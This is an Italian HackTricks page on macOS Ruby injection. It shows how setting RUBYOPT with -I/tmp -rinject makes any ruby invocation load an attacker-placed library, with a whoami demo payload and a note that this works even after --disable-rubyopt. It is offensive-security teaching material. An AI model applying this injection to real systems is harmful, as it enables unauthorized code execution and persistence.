HackTricksmacOS Ruby Applications Injection
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
RUBYOPT
Utilizzando questa variabile di ambiente è possibile aggiungere nuovi parametri a ruby ogni volta che viene eseguito. Anche se il parametro -e non può essere utilizzato per specificare il codice ruby da eseguire, è possibile utilizzare i parametri -I e -r per aggiungere una nuova cartella al percorso delle librerie da caricare e poi specificare una libreria da caricare.
Crea la libreria inject.rb in /tmp:
puts `whoami`
Crea ovunque uno script ruby come:
puts 'Hello, World!'
Poi fai caricare un arbitrario script ruby con:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Fatto divertente, funziona anche con il parametro --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Tip
Impara e pratica il hacking AWS:
Impara e pratica il hacking GCP:Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.